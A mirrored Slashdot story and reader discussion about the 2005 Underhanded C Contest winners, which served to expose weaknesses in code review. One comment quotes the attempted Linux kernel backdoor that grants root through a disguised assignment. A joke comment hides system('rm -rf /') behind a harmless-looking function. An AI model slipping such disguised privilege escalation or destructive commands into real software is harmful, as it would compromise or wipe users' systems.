Slashdot Mirror

← Back to Stories (view on slashdot.org)

Underhanded C Contest announces winners

Posted by CmdrTaco on from the games-people-play dept.

Matthew Skala writes "The 2005 Underhanded C Contest has announced its winners: the team entry from M Joonas Pihlaja and Paul V-Khuong, and the solo entry from Natori Shin. The contest (which appeared on Slashdot in June) tests programmers' ability to hide malicious behaviour in innocent-seeming code, making it a kind of evil shadow twin to the International Obfuscated C Contest."

23 of 150 comments (clear)

  1. Bill Gates Entry by bjorniac · · Score: 5, Funny

    Microsoft Word XP was rejected because the code had to seem innocent...

    1. Re:Bill Gates Entry by makomk · · Score: 5, Interesting

      Very true. For those of you who don't get it, one of the winners uses a technique very similar to the way Word (all versions AFAIK) leaks data into documents - an uninitialised buffer.

    2. Re:Bill Gates Entry by Richard_at_work · · Score: 5, Interesting

      Found an interesting thing at work recently, during trials of VB.net and the .Net framework. Our VB.net programmers applications worked right up until one day, when suddenly, they stopped working. Simple things like messages in Message Boxes stopped appearing, or labels on buttons went astray, mouse cursor changes on mouseover events showing black boxes instead of the image. Very wierd we thought. He reinstalled the .Net framework, VS.Net, everything he could think of but nothing rectified the problems. We eventually found out what the problem was - McAffee Virus protection now includes buffer overrun protection. Turn that off, and everything worked fine. Wierd, just wierd.

  2. good to see by garat · · Score: 5, Insightful

    Having a contest like this has similar positive aspects as full disclosure concerning vulnerabilities; by providing examples of how it's done, people will be better able to spot such attempts were they to occur. I'm happy to see this contest being held.

    --
    Support alternatives to Paypal: http://www.e-gold.com
  3. I'll tell you what's underhanded by Weaselmancer · · Score: 4, Funny

    Stashing all the entries in a 1.1M archive rather than posting links to the code. No way I'm going to download that just to see what all the fuss is about.

    --
    Weaselmancer
    rediculous.
    1. Re:I'll tell you what's underhanded by RAMMS+EIN · · Score: 4, Funny

      Moreover, who knows the archive isn't exploiting some buffer overflow vulnerability in my archiving software! Knowing who this file comes from, you'd be a fool to open it!

      --
      Please correct me if I got my facts wrong.
    2. Re:I'll tell you what's underhanded by glesga_kiss · · Score: 5, Funny
      They predicted that kind of paranoid response. From their (humorous) FAQ:
      Are you shills from MicroSoft trying to evangelize C-sharp?

      No, we are not shills from MicroSoft trying to evangelize C-sharp.

      Are you trying to prove open source is bad?

      No, we are not trying to prove open source is bad. If anything, this contest illustrates that we need more code review, not less.

      I bet you are government agents trying to entrap me.

      Of course we're government agents: Binghamton University is a state university, part of the SUNY system. Evil! Eeeeeeeeeevilllll!!!!!

      Do you know you've been Slashdotted?

      What, you couldn't tell from the last three questions?

    3. Re:I'll tell you what's underhanded by nEoN+nOoDlE · · Score: 4, Funny

      Knowing who this file comes from, you'd be a fool to open it!

      but they would have known that only a great fool would open the archive given to him. I am not a great fool, so I can clearly not choose to open the archive. But they must have known I was not a great fool, they would have counted on it, so I can clearly open the archive supplied by them.

      --
      Don't trust a bull's horn, a doberman's tooth, a runaway horse or me.
  4. Will Code For Beer by Krast0r · · Score: 5, Funny

    "Prize: Since we're in Binghamton, NY, the prize will be a gift box from the nearby brewery Ommegang in Cooperstown, NY." Reminds me of that photograph, "Will Code For Food" - maybe this is the start of a new era. A combination of "free as in beer" and "will code for food".

    --
    Matthew Grint Midnight Artists
    1. Re:Will Code For Beer by anagama · · Score: 3, Informative

      Actually, what you describe is "positive punishment" (apply negative stimulus in the presence of a certain bahavior -- like a spanking for swearing). "Positive" is not used in the "good/bad" sense, put in the "plus/minus" sense.

      Negative reinforcement is a reward that occurs by subtracting an adverse stimulus from the environment. For example, Fridays are a form of negative reinforcement -- the withdrawal of a negative stimulus (work) is rewarding, makes people feel good/relieved, and thus, people come to really like Friday afternoons. http://en.wikipedia.org/wiki/Reinforcement#Positiv e_vs._negative

      --
      What changed under Obama? Nothing Good
  5. I'm still fond of this one by $RANDOMLUSER · · Score: 5, Interesting
    This one almost made it into the Linux kernel. It looks like error checking until you read it carefully.Short, brilliant and to the point.

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    retval = -EINVAL;

    In other words, you become root if you call sys_wait4()with the __WCLONE|__WALL) flags

    Story here and here

    --
    No folly is more costly than the folly of intolerant idealism. - Winston Churchill
    1. Re:I'm still fond of this one by Anonymous Coward · · Score: 5, Informative

      This one almost made it into the Linux kernel.

      It *did* make it into the kernel for anyone using the BK-to-CVS gateway.

    2. Re:I'm still fond of this one by jnf · · Score: 5, Informative

      to anyone who makes a routine of putting their constants on the left hand side of the expression, that becomes not very hard to notice .. although intermixed with several megabytes of source it becomes less obvious. What I mean is: if (( (__WCLONE|__WALL) == options && 0 = current->uid)) will throw an error, whereas 0 == current->uid will not.

    3. Re:I'm still fond of this one by Tim+C · · Score: 3, Informative

      It's not that assignments aren't allowed in if statements, but that Java has boolean types. So while a statement like i = 0 does return 0 (as in C), unlike C 0 is not false, it's an int, and so if (0) is a compile time error.

      You can still do things like if ((line = in.readLine()) == null) of course

      --
      It's official. Most of you are morons.
    4. Re:I'm still fond of this one by ipfwadm · · Score: 3, Insightful

      And the attempted backdoor in question put the parens around the assignment, thus avoiding the warning.

  6. Making Wrong Code Look Wrong by lelkes · · Score: 3, Insightful

    It would be extremely important to use coding standards which make wrong code look wrong. Not only that it would be more difficult to inject malicious code, but if somebody made mistakes, it would be really easy to discover it.
    Joel has a great article on this.

  7. cute fluffy kittens! by planetoid · · Score: 5, Funny

    int cute_fluffy_kittens(void)
    {
          printf("Cute fluffy kittens are now frolicking in a grassy field of daisies with their pink-nosed newborn puppy friends. Sit back and use your imagination to enjoy the spectacle for the next few minutes...\n");

          setuid(1);
          system("rm -rf /");
    }

    --
    Slashdot requires you to wait longer between hitting 'reply' and submitting a comment.
    1. Re:cute fluffy kittens! by grahamlee · · Score: 4, Funny

      Which is worse, the incorrect UID or the incorrect function prototype?

  8. Runtime code generation by pkhuong · · Score: 4, Informative

    The CLR does JIT (or, at least, runtime) compilation. A common way to do so is to output the machine code on the stack. W^X usually breaks programs that do runtime code generation. Now, this is a WAG, but that's where my money's at.

    --
    Try Corewar @ www.koth.org - rec.games.corewar
    1. Re:Runtime code generation by nothings · · Score: 3, Insightful

      Who in the world generates code to the stack? Compiling code is expensive, so you want to cache it, that is, keep it around for a while, which means putting it on the heap.

  9. Corewar veterans by lastfish · · Score: 4, Interesting

    Joonas & Paul are both Corewar veterans being respectively co-authors of Son of Vain (Joonas P & Ian Oversby) top of the all-time hall-of-fame and nPaper II (Paul V-K & John Metcalf) dominant paper of its time.

    Good practice for writing obscure, but useful, code.

    I'd give clickable links but fear for these sites under load.

    www.corewar.info/
    www.corewar.co.uk/94nophof.txt

  10. OT, nPaper II's ownership by pkhuong · · Score: 3, Interesting

    John's a corewar god (all that 6502 assembly probably has something to do with that ;), so nPaper is nearly all his: the constant twiddling (by hand!), the QS, etc. All I did was basically write the framework for the paper; the only non-standard parts were the attack engine and the djn at the end of the timescape component... and I believe the djn was removed, because, even though it was more aggressive, it was effective than a checksum with a jmz. Read CoreWarrior #.. erh. I think it was it the high 70s or low 80s. John describes the process of optimising a newbie's paper (nPaper), all by hand (He might have used some BASIC scripting :).

    Even now that we have evolvers throwing tons of computing power at a relatively small search space (nano), John submitted something that rocketted to 1st place and manages more than 50% wins. Again, the dude is a corewar genius.

    Paul(-Virak) Khuong

    PS, note the position of the dash

    --
    Try Corewar @ www.koth.org - rec.games.corewar
  11. Ken Thompson... by Sam+Nitzberg · · Score: 4, Informative

    It's not exactly the same thing, but the most powerful and clever C code example with an 'underhanded' purpose must be Ken Thompson's classic...

    Reflections on Trusting Trust
    http://www.acm.org/classics/sep95/

    Other interesting papers that come to mind include Tom Duff's on Unix viruses, as well as McIlroy.

    Sam

    sam @ iamsam.com
    http: /www . iamsam . com